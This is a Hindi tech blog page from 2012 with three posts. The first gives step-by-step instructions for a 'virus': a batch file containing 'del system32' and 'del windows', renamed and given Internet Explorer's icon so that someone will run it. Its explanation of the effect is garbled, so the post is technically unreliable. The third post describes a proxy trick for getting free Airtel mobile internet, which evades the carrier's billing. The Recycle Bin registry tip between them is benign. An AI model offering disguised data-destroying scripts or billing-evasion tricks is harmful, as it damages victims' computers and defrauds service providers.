Hindi Tech Blog

ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं
ट्रिक लेबलों वाले संदेश दिखाए जा रहे हैं. सभी संदेश दिखाएं

30 जनवरी 2012

नोटपेड के माध्यम से बनाईये वायरस



१. नोटपेड खोलिए और लिखें "del system32"
२. फिर एंटर बटन दबाए और लिखें "del windows"
३. इस फाइल को सेव करें save as tpye all files में virus.bat के नाम से।
४. इसे रिनेम कर लिखें Internet Explorer
५. फिर फाइल को राइट क्लिक करें और प्रोपर्टी में जाएँ।
६. फिर Change icon पे क्लिक करे और Internet Explorer का आइकॉन सेट करें।
७. आपका वायरस तेयार है।


जब भी इस फ़ाइल पे डबल क्लीक करेंगे तो ये del system32 को डीलीट कर देगा।


Note: This post is for EDUCATIONAL purpose only, what you do with it is your own responsibilities.

बदलिए अपने रिसाइकिल बिन का नाम



विंडोज विस्टा में तो यह सीधे तरीके से हो जाता हैं लेकिन विंडोज एक्सपी में इसे इसे रीनेम करने का आप्शन ही नही आता| अगर आप भी अपने Recycle Bin का नाम बदलना चाहते हैं तो पढ़े यह आसन सा तरीका-

रन(RUN) कमांड खोलकर उसमे REGEDIT लिखकर इंटर की प्रेश करें |
आपके इंटर करते ही Registry Editor नाम का विंडो खुलकर आ जायेगा |

अब उसमे Edit आप्शन पर जाकर Find आप्शन पर क्लिक करें या कण्ट्रोल के साथ F प्रेस करें और उसमे टाइप करें 645FF040
इसके बाद Find Next पर क्लिक कर दे अब विडो के दाहिने तरफ आपको Default लिखा दिखाई देगा,
उस पर डबल क्लिक करें value data में जाकर अपना मनचाहा नाम लिखकर ओके कर दे,
उसके बाद रजिस्ट्री एडिटर को क्लोज करके डेस्कटॉप पर जाकर रिफ्रेश(Refresh) करें,
अब आपको Recycle Bin की जगह आपका मनचाहा नाम लिखा दिखाई देगा|

ध्यान दे -सर्च कराते समय -Match whole string only पर चेकमार्क किये बिना ही सर्च कराये |

22 जनवरी 2012

फ्री फास्ट एयरटेल इन्टरनेट ट्रिक जनवरी 2012

airtel free internet
Airtel

नमस्कार मित्रों, आपका स्वागत है यहाँ। आज फिर लाया हूँ एयरटेल फ्री इंटरनेट ट्रिक, यह ट्रिक मैंने खुद इस्तेमाल करके देखी है।
करीब 200 से 300 केबीपीएस की स्पीड मिल रही है।
फ्री internet चलाने के लिए बस निम्न चरण अपनाएं।
एयरटेल मोबाइल ऑफिस डिफाल्ट सेटिंग से नेट कनेक्ट कीजिये,
और निम्न प्रोक्सी पोर्ट और होमपेज अपने ब्राउज़र में सेट कीजिये।

एक्सेस पॉइंट - airtelgprs.com
पोर्ट - 80
प्रोक्सी - 174.142.196.230 अथवा  85.214.50.141
होमपेज - http://fb.me अथवा  http://0.facebook.com/index.php

loading...